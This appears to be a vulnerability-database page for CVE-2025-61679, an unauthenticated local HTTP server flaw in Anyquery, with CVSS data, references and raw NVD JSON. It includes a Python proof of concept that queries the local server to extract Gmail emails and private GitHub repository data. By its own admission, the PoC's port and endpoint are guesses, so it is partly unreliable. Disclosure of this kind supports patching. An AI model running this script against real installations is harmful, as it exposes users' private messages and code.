Security Vulnerability Report
CVE-2025-61679 CVSS 7.7 HIGH

CVE-2025-61679

Published: 2025-10-03 22:15:33
Last Modified: 2026-04-15 00:35:42

Description

Anyquery is an SQL query engine built on top of SQLite. Versions 0.4.3 and below allow attackers who have already gained access to localhost, even with low privileges, to use the http server through the port unauthenticated, and access private integration data like emails, without any warning of a foreign login from the provider. This issue is fixed in version 0.4.4.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Anyquery <= 0.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61679 PoC - Anyquery Unauthorized Local Access
# This PoC demonstrates how an attacker with local access can
# query private integration data via Anyquery's unauthenticated HTTP server
import requests

# Default Anyquery HTTP server port (typically 8073 or configurable).
# Note: the port and the "/query" endpoint used below are this PoC's own
# assumptions; the advisory text does not state them.
TARGET_HOST = "http://127.0.0.1:8073"


def exploit_anyquery_unauthorized_access():
    """
    Exploit CVE-2025-61679: Access Anyquery HTTP server without authentication
    to retrieve private integration data (e.g., emails, GitHub data)
    """
    print("[*] CVE-2025-61679 - Anyquery Unauthorized Access PoC")
    print(f"[*] Target: {TARGET_HOST}")

    # Step 1: Check if Anyquery HTTP server is accessible
    try:
        resp = requests.get(f"{TARGET_HOST}/", timeout=5)
        if resp.status_code == 200:
            print("[+] Anyquery HTTP server is reachable without authentication!")
    except requests.exceptions.ConnectionError:
        print("[-] Cannot connect to Anyquery HTTP server")
        return

    # Step 2: Execute arbitrary SQL queries to extract private data
    # Query 1: List available tables (integration data sources)
    payload = {"query": "SELECT name FROM sqlite_master WHERE type='table';"}
    resp = requests.post(f"{TARGET_HOST}/query", json=payload, timeout=5)
    print(f"[+] Available tables: {resp.text}")

    # Step 3: Extract private emails from integrated email account
    payload_email = {"query": "SELECT * FROM gmail_emails LIMIT 10;"}
    resp = requests.post(f"{TARGET_HOST}/query", json=payload_email, timeout=5)
    print(f"[+] Stolen email data: {resp.text}")

    # Step 4: Extract private GitHub repository information
    payload_github = {"query": "SELECT name, private FROM github_my_repositories;"}
    resp = requests.post(f"{TARGET_HOST}/query", json=payload_github, timeout=5)
    print(f"[+] Stolen GitHub data: {resp.text}")


if __name__ == "__main__":
    exploit_anyquery_unauthorized_access()
```

References

https://github.com/julien040/anyquery/commit/43cd8bd3354b9725b245a2354b08e1c9be1cc1d3
https://github.com/julien040/anyquery/releases/tag/0.4.4
https://github.com/julien040/anyquery/security/advisories/GHSA-5f7p-rhmq-hvc7

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-61679", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anyquery is an SQL query engine built on top of SQLite. Versions 0.4.3 and below allow attackers who have already gained access to localhost, even with low privileges, to use the http server through the port unauthenticated, and access private integration data like emails, without any warning of a foreign login from the provider. This issue is fixed in version 0.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/julien040/anyquery/commit/43cd8bd3354b9725b245a2354b08e1c9be1cc1d3", "source": "[email protected]"}, {"url": "https://github.com/julien040/anyquery/releases/tag/0.4.4", "source": "[email protected]"}, {"url": "https://github.com/julien040/anyquery/security/advisories/GHSA-5f7p-rhmq-hvc7", "source": "[email protected]"}]}}
```